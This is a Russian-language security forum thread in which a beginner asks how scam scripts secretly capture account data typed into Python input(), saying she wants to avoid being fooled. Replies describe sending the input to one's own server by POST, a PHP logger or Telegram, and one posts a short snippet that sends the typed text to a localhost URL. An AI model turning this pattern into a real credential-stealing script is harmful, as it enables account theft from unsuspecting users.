• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

как узнать что вводиться пользователем в input? (python)

Avi ne

New member
14.08.2021
1
0
BIT
0
я только учу питон. (я не знаю этот язык программирования проще говоря) и я встречала хакеров которые предлагали услуги где обязательно надо вводить данные от аккаунта. и мне стало интересно как будет выглядеть такой код и возможно ли так легко его создать просто сделать вводимое в Input() видимым для автора скрипта. ( в интернете я ничего интересного не нашла по этой теме, вообще есть такая соц сеть как Амино где легко можно украсть аккаунт таким способом. и чтобы не попасться на это я бы хотела увидеть примерно как работает подобное)

Pernat1y

Well-known member
05.04.2018
1 443
135
BIT
0
Интересующую инфу можно отправить post запросом, например.
На своём сервере поймать его простым PHP скриптом и записать в базу/файл.
Ещё, как вариант, можно письмом или просто в telegram, но это менее безопасно, ибо креды нужно будет в скрипте держать.

BearSec

Platinum
20.04.2020
210
290
BIT
28
я только учу питон. (я не знаю этот язык программирования проще говоря) и я встречала хакеров которые предлагали услуги где обязательно надо вводить данные от аккаунта. и мне стало интересно как будет выглядеть такой код и возможно ли так легко его создать просто сделать вводимое в Input() видимым для автора скрипта. ( в интернете я ничего интересного не нашла по этой теме, вообще есть такая соц сеть как Амино где легко можно украсть аккаунт таким способом. и чтобы не попасться на это я бы хотела увидеть примерно как работает подобное)
Python:
import requests

while (1==1):
    print('Enter your name:')
    name = input()
    print('Hello, ' + name + '\n')
    ploads = {'things':2,'total':25}
    r = requests.get('http://127.0.0.1/?name='+name)

Screenshot_1.png

Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!